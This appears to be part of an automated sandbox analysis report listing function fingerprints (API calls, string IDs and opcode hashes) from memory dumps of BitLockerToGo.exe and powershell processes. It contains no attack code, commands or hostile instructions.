                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: cde57da3a79e6a87f0c7d810aec05a71ab125cbdd174a4b4b4d16c085b841449
                                        • Instruction ID: 2897dc78d770a876882c10514ba6d2eedb3b2f4c5191010aac5325a5060beb00
                                        • Opcode Fuzzy Hash: cde57da3a79e6a87f0c7d810aec05a71ab125cbdd174a4b4b4d16c085b841449
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: ae1562b030efd25c46d658ad9ed8f5426444ada87f0268ad9a4c7591ccb96268
                                        • Instruction ID: b66b1208881bb68992923df952ae7b919db46587aa663dd534678a09f6b4378a
                                        • Opcode Fuzzy Hash: ae1562b030efd25c46d658ad9ed8f5426444ada87f0268ad9a4c7591ccb96268
                                        • Instruction Fuzzy Hash: E4A011302002028B83008F38AA0A32A3AEABA00288B00A238A802C2220EB208000EA08
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 006E2CE7
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 006E2CEF
                                        • _ValidateLocalCookies.LIBCMT ref: 006E2D78
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 006E2DA3
                                        • _ValidateLocalCookies.LIBCMT ref: 006E2DF8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: 7*n$csm
                                        • API String ID: 1170836740-226784482
                                        • Opcode ID: 940f441eb412d6a3fb58fdb57eebf15d180f6f067e2ebfca0b39e49c59c23511
                                        • Instruction ID: 261cdfea635226149c067c19b68c3494101371bf7e60f9ab489e54d72ca80103
                                        • Opcode Fuzzy Hash: 940f441eb412d6a3fb58fdb57eebf15d180f6f067e2ebfca0b39e49c59c23511
                                        • Instruction Fuzzy Hash: A241E630A0135A9BCF10DF6ACC95AAE7BBBAF05324F148059E9145B3A2C771DA01CB90
                                        APIs
                                        • GetCPInfo.KERNEL32(008F6980,008F6980,?,7FFFFFFF,?,006F3D10,008F6980,008F6980,?,008F6980,?,?,?,?,008F6980,?), ref: 006F3AE6
                                        • __alloca_probe_16.LIBCMT ref: 006F3BA1
                                        • __alloca_probe_16.LIBCMT ref: 006F3C30
                                        • __freea.LIBCMT ref: 006F3C7B
                                        • __freea.LIBCMT ref: 006F3C81
                                        • __freea.LIBCMT ref: 006F3CB7
                                        • __freea.LIBCMT ref: 006F3CBD
                                        • __freea.LIBCMT ref: 006F3CCD
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: __freea$__alloca_probe_16$Info
                                        • String ID:
                                        • API String ID: 127012223-0
                                        • Opcode ID: 6ba4b83adbfe4a0da34db2fcbc884becdcea8679821b2f3f4b76ea431ebc540e
                                        • Instruction ID: f85a1ecc1a6dfe2574844cb5520ac8cfa047794e0516e2023b96022bcdf9e656
                                        • Opcode Fuzzy Hash: 6ba4b83adbfe4a0da34db2fcbc884becdcea8679821b2f3f4b76ea431ebc540e
                                        • Instruction Fuzzy Hash: 1671F572A0436DABDF219E548C42BFE7BBBAF55310F290159EB04BB381E635DE018764
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: _strrchr
                                        • String ID:
                                        • API String ID: 3213747228-0
                                        • Opcode ID: 859f8dc02c0d924f0ac8cd8ad241f2096ee5bd756e0813663e7e818fbe506fee
                                        • Instruction ID: 6cb8f2cb9a5e0cde3d3c01b2702f6e787751e9d94c625f3abab5075e4b0618ca
                                        • Opcode Fuzzy Hash: 859f8dc02c0d924f0ac8cd8ad241f2096ee5bd756e0813663e7e818fbe506fee
                                        • Instruction Fuzzy Hash: 44B135729023D59FDB158FA5CC81BEE7FA6EF55310F144199E904AB382D270AD01C7A6
                                        APIs
                                        • type_info::operator==.LIBVCRUNTIME ref: 006E345A
                                        • ___TypeMatch.LIBVCRUNTIME ref: 006E3568
                                        • CallUnexpected.LIBVCRUNTIME ref: 006E36D5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 1206542248-393685449
                                        • Opcode ID: 0b71a31bb691b94f356cebec38b9bdd80d1624ab9656f22c7818cbc82b7e580b
                                        • Instruction ID: f226aceed32ba0b412178de1c618c0edf57518bccbb328a5946cedcd41b58320
                                        • Opcode Fuzzy Hash: 0b71a31bb691b94f356cebec38b9bdd80d1624ab9656f22c7818cbc82b7e580b
                                        • Instruction Fuzzy Hash: 37B18A318023A9EFCF25DFA6C8899AEBBB6BF04310B14415AE8116B352D731DB51CF91
                                        APIs
                                        • GetLastError.KERNEL32(?,?,006E2FFB,006E2BE3,006E20C6), ref: 006E3012
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006E3020
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006E3039
                                        • SetLastError.KERNEL32(00000000,006E2FFB,006E2BE3,006E20C6), ref: 006E308B
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 42464a8d4b03a811e8da802d2e57983b288704a3322d40074550181cfb912cd7
                                        • Instruction ID: ed607b9d798442dde7fc722269b818dd6ed07a1516adad48dd1649a92b0a217d
                                        • Opcode Fuzzy Hash: 42464a8d4b03a811e8da802d2e57983b288704a3322d40074550181cfb912cd7
                                        • Instruction Fuzzy Hash: 7C01D83214B3B65EE7642677AC896B72A47EB11B75730022DF510433F1EF934E55D148
                                        Strings
                                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, xrefs: 006ECA23
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                        • API String ID: 0-3335149998
                                        • Opcode ID: 79e3155d272309d2360f40692456074b433a4542021df02fad3b37fed545ef6f
                                        • Instruction ID: f40cbf558b23978d66033edc69e18063c47f750f7ca8f79a5983efcc81bc545c
                                        • Opcode Fuzzy Hash: 79e3155d272309d2360f40692456074b433a4542021df02fad3b37fed545ef6f
                                        • Instruction Fuzzy Hash: 9F216572602389BFDB10EF7BCC41DAA77ABAF443747144529F81597250D731DC4297A4
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,97F6FAD1,?,?,00000000,006F5F21,000000FF,?,006E926C,006E9350,?,006E9240,00000000), ref: 006E92C5
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006E92D7
                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,006F5F21,000000FF,?,006E926C,006E9350,?,006E9240,00000000), ref: 006E92F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: eaec7258b9b6471dedfeaf3fe5fc49069c6481cbe7deae9d78f40da9c7ac893a
                                        • Instruction ID: fd881af7099d120eea4ec2ac30b250a7b3fa711d898ce15db5b796c87db75c4d
                                        • Opcode Fuzzy Hash: eaec7258b9b6471dedfeaf3fe5fc49069c6481cbe7deae9d78f40da9c7ac893a
                                        • Instruction Fuzzy Hash: 7501AD72954659AFCB118F50DC09FBEBBBAFB04B14F100525F922E26E0DF79A900CA94
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,006E40D3,00000000,?,006FEDBC,?,?,?,006E4276,00000004,InitializeCriticalSectionEx,006F6CA0,InitializeCriticalSectionEx), ref: 006E412F
                                        • GetLastError.KERNEL32(?,006E40D3,00000000,?,006FEDBC,?,?,?,006E4276,00000004,InitializeCriticalSectionEx,006F6CA0,InitializeCriticalSectionEx,00000000,?,006E402D), ref: 006E4139
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 006E4161
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID: api-ms-
                                        • API String ID: 3177248105-2084034818
                                        • Opcode ID: 3befe350e442994d0ebdaade4ab340fc785fa1e0b4a8d0eac6035222ad9aa58a
                                        • Instruction ID: 7029a38d03c5ed158d3d427ad01a6ce34c22bc25545e949e36be24efec7c5e85
                                        • Opcode Fuzzy Hash: 3befe350e442994d0ebdaade4ab340fc785fa1e0b4a8d0eac6035222ad9aa58a
                                        • Instruction Fuzzy Hash: E4E01A30694348B7EF101B72ED06FF93A56AB50B51F205060F90CE81A0DFA1D8949685
                                        APIs
                                        • GetConsoleOutputCP.KERNEL32(97F6FAD1,00000000,00000000,?), ref: 006EF1E6
                                          • Part of subcall function 006ED5BC: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006F25BF,?,00000000,-00000008), ref: 006ED61D
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006EF438
                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006EF47E
                                        • GetLastError.KERNEL32 ref: 006EF521
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                        • String ID:
                                        • API String ID: 2112829910-0
                                        • Opcode ID: 05a0762f142777bd0eff245852be24aa3fa4bb1b39220de079e891c89035a989
                                        • Instruction ID: 1f10072ae48cff7017dd218e3a7472a8202d5faa66a0a402bab3e822f9ba460f
                                        • Opcode Fuzzy Hash: 05a0762f142777bd0eff245852be24aa3fa4bb1b39220de079e891c89035a989
                                        • Instruction Fuzzy Hash: E1D16A75D01288DFDB14CFA9D8809EDBBF6FF09314F28456AE516EB352E630A942CB50
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: b24c487e519e00e9dc3988771ed91efa209cca49a41a2fe06594e63ad0b23d1c
                                        • Instruction ID: b56d4d707d1d69663366f6c61bd39111c46381e922a4268de29775e210daeba3
                                        • Opcode Fuzzy Hash: b24c487e519e00e9dc3988771ed91efa209cca49a41a2fe06594e63ad0b23d1c
                                        • Instruction Fuzzy Hash: D051E2726023A6AFDB288F16D949BEA77A7EF00700F24402DEA4547391E731EF45CB94
                                        APIs
                                          • Part of subcall function 006ED5BC: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006F25BF,?,00000000,-00000008), ref: 006ED61D
                                        • GetLastError.KERNEL32 ref: 006EC285
                                        • __dosmaperr.LIBCMT ref: 006EC28C
                                        • GetLastError.KERNEL32(?,?,?,?), ref: 006EC2C6
                                        • __dosmaperr.LIBCMT ref: 006EC2CD
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 1913693674-0
                                        • Opcode ID: 47371e80a725b2c6c3fc4fce70047077a3a49468137aab409c865c559ffbcf5b
                                        • Instruction ID: 8e45133a09b2fdcd88eab4e4bf5ad853551f97b4d4c0dfe95779d39a16f462ca
                                        • Opcode Fuzzy Hash: 47371e80a725b2c6c3fc4fce70047077a3a49468137aab409c865c559ffbcf5b
                                        • Instruction Fuzzy Hash: 6E21A471602785AFDB21AFB7C8808AB7BABFF443747108519F91AD7240D731ED429BA4
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 006ED667
                                          • Part of subcall function 006ED5BC: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006F25BF,?,00000000,-00000008), ref: 006ED61D
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006ED69F
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006ED6BF
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 158306478-0
                                        • Opcode ID: 67733ed8f14482b82cab6e05df8d303cbec22faca63591bc920f7356ea2c9c14
                                        • Instruction ID: 7b3f49c025874048a8f6dd72d84a8d3d1b9bcf86b79a6fb6bf97e55a740e4537
                                        • Opcode Fuzzy Hash: 67733ed8f14482b82cab6e05df8d303cbec22faca63591bc920f7356ea2c9c14
                                        • Instruction Fuzzy Hash: 1211C4B1503BA67EAB112BB79C89CBF7B6FDE85398B240419F80691101EE70DD01857D
                                        APIs
                                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,006F2E23,00000000,00000001,?,?,?,006EF575,?,00000000,00000000), ref: 006F3D91
                                        • GetLastError.KERNEL32(?,006F2E23,00000000,00000001,?,?,?,006EF575,?,00000000,00000000,?,?,?,006EFB18,?), ref: 006F3D9D
                                          • Part of subcall function 006F3D63: CloseHandle.KERNEL32(FFFFFFFE,006F3DAD,?,006F2E23,00000000,00000001,?,?,?,006EF575,?,00000000,00000000,?,?), ref: 006F3D73
                                        • ___initconout.LIBCMT ref: 006F3DAD
                                          • Part of subcall function 006F3D25: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006F3D54,006F2E10,?,?,006EF575,?,00000000,00000000,?), ref: 006F3D38
                                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,006F2E23,00000000,00000001,?,?,?,006EF575,?,00000000,00000000,?), ref: 006F3DC2
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                        • String ID:
                                        • API String ID: 2744216297-0
                                        • Opcode ID: bf96ba4b8dede732f7944b7ffdac0c7f141b1fa4aa3f23a842ed6f7f35cadca6
                                        • Instruction ID: 29c1d3fe29e452dab1a1ca019c43b04244b2801269062c99962360406ff1779e
                                        • Opcode Fuzzy Hash: bf96ba4b8dede732f7944b7ffdac0c7f141b1fa4aa3f23a842ed6f7f35cadca6
                                        • Instruction Fuzzy Hash: F9F0C93650112DBBCF622FD5EC08DAA3F27FF093B1B145414FA1995270DA328A60EBA0
                                        APIs
                                        • EncodePointer.KERNEL32(00000000,?), ref: 006E3705
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: EncodePointer
                                        • String ID: MOC$RCC
                                        • API String ID: 2118026453-2084237596
                                        • Opcode ID: b4ae32a028829b6a362817902124115b27527ac14557c92418c98945a541522e
                                        • Instruction ID: 7837762cf3eb12d1f188cc6b21269cf3e2d8f8d04fc24f96f4e77b5da651af16
                                        • Opcode Fuzzy Hash: b4ae32a028829b6a362817902124115b27527ac14557c92418c98945a541522e
                                        • Instruction Fuzzy Hash: F5418BB1901259EFCF16DF99CC85AEEBBB6BF08300F258099F90467311D335AA51DB54
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006E21B8
                                        • ___raise_securityfailure.LIBCMT ref: 006E22A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                        • String ID: ho
                                        • API String ID: 3761405300-2736295918
                                        • Opcode ID: dfbe9d29ed15de4e4a7990cfd5ce90ca5ad1aaf9d9e20c29e599d1b127968153
                                        • Instruction ID: d259b0d2ecd4a701e38d069cfa417e48ae6fa3cc5d2e86eb923f7406af65a1b0
                                        • Opcode Fuzzy Hash: dfbe9d29ed15de4e4a7990cfd5ce90ca5ad1aaf9d9e20c29e599d1b127968153
                                        • Instruction Fuzzy Hash: 3221F0B8500304DAE310CF29EA957607FA7BB09300F10646AEA068B7B0E3B25981CF0A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1692340007.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6f10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7cd28820b26283c90be4128f43baa0ac01a2f47ca4a78375c6fc47edce4206e0
                                        • Instruction ID: ee1cce43c16dcf188088009606949969c45a894b213811cae3100db0b0c34b02
                                        • Opcode Fuzzy Hash: 7cd28820b26283c90be4128f43baa0ac01a2f47ca4a78375c6fc47edce4206e0
                                        • Instruction Fuzzy Hash: 88124832F043158FEB65DB6898107AABBA29FC6291F14C4BADA05CF391DB31C945C7E1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1686157084.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_29e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b03bba2a7ea9e79fb1b3228fe62daa16dd79fcecb25ab0859a0f997e4262dbd
                                        • Instruction ID: aa958ba99140b91ab5abcb5f46c59e8346b052b9c5a707d471e359a5b34bc818
                                        • Opcode Fuzzy Hash: 3b03bba2a7ea9e79fb1b3228fe62daa16dd79fcecb25ab0859a0f997e4262dbd
                                        • Instruction Fuzzy Hash: 1F028B34A053589FDB02CFA8D494ADEBBB1FF89310F298096E445AB362C734ED45CB95
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1686157084.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_29e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bdc97692c777621c6e8cdc8c2297a699d445bdbcc60a72f5d1f796b0632dcb1d
                                        • Instruction ID: f94a32d3777dd152b5130b35b672630d9ed9a51778f87483a504a4cb7b8bf724
                                        • Opcode Fuzzy Hash: bdc97692c777621c6e8cdc8c2297a699d445bdbcc60a72f5d1f796b0632dcb1d
                                        • Instruction Fuzzy Hash: BF023C74A00219DFDB15CF98C484AAEFBB6FF88314F248169E856AB355C735ED42CB90
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1686157084.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_29e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0266076a170a05c4bc22e2b93453ad768140af90c5a3464ae8a7df458e9285da
